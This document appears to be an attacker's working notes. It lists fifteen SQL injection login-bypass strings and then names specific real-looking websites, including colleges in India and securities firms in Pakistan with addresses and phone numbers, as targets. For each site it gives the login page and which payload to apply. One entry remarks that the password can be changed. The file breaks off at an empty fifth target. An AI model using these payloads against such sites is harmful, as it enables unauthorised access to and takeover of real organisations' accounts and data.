BLIND SQL RULE:
===========================================================================
1) or '1'='1
2)1'or'1'='1
3) ' or 'x'='x
4)' or 0=0 --
5)" or 0=0 --
6)or 0=0 --
7)' or 0=0 #
8)" or 0=0 #
9)or 0=0 #
10)' or 'x'='x
11)" or "x"="x
12)') or ('x'='x
13)' or 1=1--
14)" or 1=1--
15)or 1=1--

============================================================================
TARGET 1:
----------

www.snvmpgcollege.com
Uttar Pradesh, Sultanpure

www.snvmpgcollege.com/alogin.aspx
====>>> apply rule no 2)

TARGET 2:
----------

http://www.safesecurities.com.pk
Lahore Office: 	  	 
  	  	 
Address: 	  	Room# 514, 5th Floor, Lahore Stock Exchange Building, 19 Khyaban-e-Awan-e-Iqbal, Lahore 54000, Pakistan.
Phone: 	  	042-36316719-21, 36368652
Fax: 	  	042-36316720
  	  	 
Islamabad Office: 	  	 
  	  	 
Address: 	  	Room# 1113, 11th Floor, Islamabad Stock Exchange Tower, 55-B Jinnah Avenue, Islamabad, Pakistan.
Phone: 	  	051-2895136-138 


http://www.safesecurities.com.pk/Login.asp
====>>> apply rule no 2)

Target 3:
----------

http://www.svc.ac.in/
Sri Venkateswara College
(A Constituent College of the University of Delhi),XXVII FILLM Congress, 14-17 March 2017 New Delhi hosted by Sri Venkateswara College, University of Delhi


	
====>>> apply rule no 2) [we can change the password]

Target 4:
----------

http://www.darson.com.pk
Head Office:

Contact Person:

Zulfiqar Ali

Room No. 102, 1st Floor,

Lahore Stock Exchange Building,

Lahore-Pakistan.

UAN: 111-900-400

Ph: +92-42-6317111, 6366655
+92-42-6316777


http://www.darson.com.pk/Login.asp
====>>> apply rule no 2)

Target 5:
----------